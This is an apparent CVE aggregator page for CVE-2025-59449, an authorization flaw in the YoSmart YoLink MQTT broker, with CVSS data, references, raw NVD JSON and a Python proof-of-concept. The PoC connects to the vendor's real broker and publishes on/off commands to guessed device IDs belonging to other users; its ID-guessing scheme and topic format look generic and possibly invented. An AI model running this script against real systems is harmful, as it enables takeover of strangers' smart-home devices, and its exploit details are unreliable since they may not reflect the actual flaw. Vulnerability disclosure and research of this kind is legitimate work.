CVE-2025-59449

Description

The YoSmart YoLink MQTT broker through 2025-10-02 does not enforce sufficient authorization controls to prevent cross-account attacks, allowing an attacker to remotely operate affected devices if the attacker obtains the associated device IDs. Because YoLink device IDs are predictable, an attacker can exploit this to gain full control over any other YoLink user's devices.

CVSS Details

CVSS Score

4.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

YoSmart YoLink MQTT Broker <= 2025-10-02

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-59449 PoC - YoSmart YoLink MQTT Cross-Account Attack # This PoC demonstrates the insufficient authorization in YoLink MQTT broker # allowing cross-account device control via predictable device IDs import paho.mqtt.client as mqtt import json import time import itertools import string # YoSmart MQTT broker configuration MQTT_BROKER = "mqtt.yosmart.com" MQTT_PORT = 8883 MQTT_USERNAME = "[email protected]" # Attacker's own credentials MQTT_PASSWORD = "attacker_password" # Attacker's own password def on_connect(client, userdata, flags, rc): if rc == 0: print(f"[*] Connected to YoLink MQTT broker with result code {rc}") else: print(f"[!] Connection failed with code {rc}") def on_message(client, userdata, msg): print(f"[*] Received message on topic {msg.topic}: {msg.payload.decode()}") def predict_device_ids(base_pattern, count=100): """ Predict YoLink device IDs based on known patterns. Device IDs are sequential or follow a predictable pattern. """ predicted_ids = [] for i in range(count): # YoLink device IDs typically follow patterns like UUIDs # but with predictable segments device_id = f"{base_pattern}-{i:04d}" predicted_ids.append(device_id) return predicted_ids def craft_control_message(device_id, action="on"): """ Craft MQTT control message for a target YoLink device. """ # YoLink MQTT topic format for device control topic = f"yl-home/{device_id}/control" # Control payload - e.g., turn device on/off payload = json.dumps({ "action": action, "timestamp": int(time.time()), "source": "attacker" }) return topic, payload def exploit(): # Step 1: Connect to MQTT broker with attacker's own credentials client = mqtt.Client(client_id="attacker_client") client.username_pw_set(MQTT_USERNAME, MQTT_PASSWORD) client.tls_set() # Use TLS encryption client.on_connect = on_connect client.on_message = on_message print("[*] Connecting to YoLink MQTT broker...") client.connect(MQTT_BROKER, MQTT_PORT, 60) client.loop_start() time.sleep(2) # Step 2: Predict target device IDs print("[*] Predicting target device IDs...") target_device_ids = predict_device_ids("dev_abc123", count=50) # Step 3: Attempt cross-account control for device_id in target_device_ids: topic, payload = craft_control_message(device_id, action="on") print(f"[*] Attempting to control device: {device_id}") # Publish control command to target device result = client.publish(topic, payload, qos=1) if result.rc == mqtt.MQTT_ERR_SUCCESS: print(f"[+] Control command sent to {device_id}") else: print(f"[-] Failed to send command to {device_id}") time.sleep(0.5) client.loop_stop() client.disconnect() print("[*] Exploit completed") if __name__ == "__main__": print("=" * 60) print("CVE-2025-59449 - YoSmart YoLink MQTT Cross-Account Attack") print("Disclaimer: For authorized security testing only") print("=" * 60) exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59449
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59449
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59449/
[4] VulDB https://vuldb.com/cve/CVE-2025-59449
[5] https://bishopfox.com/blog/advisories
[6] https://bishopfox.com/blog/how-a-20-smart-device-gave-me-access-to-your-home
[7] https://shop.yosmart.com/pages/product-support
[8] https://shop.yosmart.com/pages/sa-2025-001

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59449", "sourceIdentifier": "[email protected]", "published": "2025-10-06T20:15:36.403", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The YoSmart YoLink MQTT broker through 2025-10-02 does not enforce sufficient authorization controls to prevent cross-account attacks, allowing an attacker to remotely operate affected devices if the attacker obtains the associated device IDs. Because YoLink device IDs are predictable, an attacker can exploit this to gain full control over any other YoLink user's devices."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://bishopfox.com/blog/advisories", "source": "[email protected]"}, {"url": "https://bishopfox.com/blog/how-a-20-smart-device-gave-me-access-to-your-home", "source": "[email protected]"}, {"url": "https://shop.yosmart.com/pages/product-support", "source": "[email protected]"}, {"url": "https://shop.yosmart.com/pages/sa-2025-001", "source": "[email protected]"}]}}